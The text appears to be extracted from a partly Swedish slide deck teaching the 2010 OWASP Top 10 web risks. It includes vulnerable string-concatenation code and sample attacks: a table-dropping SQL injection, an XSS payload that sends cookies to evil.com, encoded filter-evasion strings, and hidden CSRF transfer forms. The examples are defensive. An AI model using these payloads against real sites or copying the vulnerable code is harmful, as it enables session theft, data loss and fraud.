OWASP

OWASP top 10 - Agenda

Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources

OWASP

The OWASP Guide

OWASP

ThreatAgent

AttackVector

Weakness Prevalence

Weakness Detectability

Technical Impact

Business Impact

?Easy Widespread Easy Severe

?Average Common Average Moderate

Difficult Uncommon Difficult Minor

OWASP

Warning

Risk analysis Insiders

Architecture Modular Clarity

SDLC Knowledge Predictability

OWASP

Top 10 - 2010

1. Injection 2. Cross site scripting (XSS) 3. Broken authentication and session

management 4. Insecure direct object reference 5. Cross site request forgery (CSRF) 6. Security missconfiguration 7. Insecure cryptograpic storage 8. Failure to restrict URL access 9. Insufficient transoport layer protection 10.Unvalidated redirects and forwards

OWASP

A1 – Injection

Client ApplDB

Shell

Pgm CPU

OWASP

A1 – Injection

String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'";

id="foo';DROP accnts;--"

SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';

id="foo"

SELECT * FROM accnts WHERE ID='foo';

OWASP

A2 - Cross site scripting (XSS)

Browser

Browser

Appl DB

OWASP

A2 - Cross site scripting (XSS)

(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";

CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script>

<input name='cc' value='123456789“><script> window.location=http://evil.com?x=document.cookie </script>'>

CC=“123456789"

<input name='cc' value='123456789'>

OWASP

A2 - Cross site scripting (XSS)

&#x003c&#X3c&#x3C000003C;\x3c\x3C\u003c\u003C

<%3C&lt&lt;&LT&LT;&#60&#060&#60;

<img src=http://site.com onmoseover= <body onload= <IMG SRC=j&#X41vascript:alert('test2')>

OWASP

A3 - Broken authentication and session mngmnt

Unpredictable passwords, sessions-ID, security-questions

No sessions-id/credentials i URL Avoid session-fixation Time out of sessions & logout buttons Different sessions id outside/inside TLS No clear text passwords

OWASP

A4 - Insecure direct object references

<SELECT name=period> <OPTION>2010q1</OPTION> <OPTION>2011q2</OPTION></SELECT>

period=2011q3

period=2011q2

OWASP

A5 - Cross-site request forgery (CSRF)

<img src="http://example.com/transferFunds?amount=1500 &destinationAccount=attackersAcct#“width="0" height="0" />

<body onload="document.forms[0].submit()"> <form method="POST" action="https://bank.com/fn">    <input type="hidden" name="sp" value="8109"/> </form>

OWASP

A6 - Security missconfiguration

Patching OS Application Frameworks / libraries

Disable unnecessary services Stack traces Configuration

OWASP

A7 - Insecure cryptographig storage

Keep track on sensitive data Password one-way-hashed & salted Password/Key management

TLS key pass phrase M2M lösenord (obfuscation)

OWASP

A8 - Failure to restrict URL access

/user/getAccounts/admin/getAccounts

OWASP

A9 - Insufficient transport layer protection

Use SSL/TLS No mixed content Use secure cookies

Example FireSheep exploits poor solutions

OWASP

A10 - Unvalidated redirects and forwards

http://www.vuln.com/redir.asp?=http://www.links.com

http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D

OWASP

OWASP resurser

OWASP Secure Software Contract Annex OWASP Developer’s Guide OWASP Enterprise Security API (ESAPI) OWASP Software Assurance Maturity Mode

l (SAMM)

OWASP WebGoat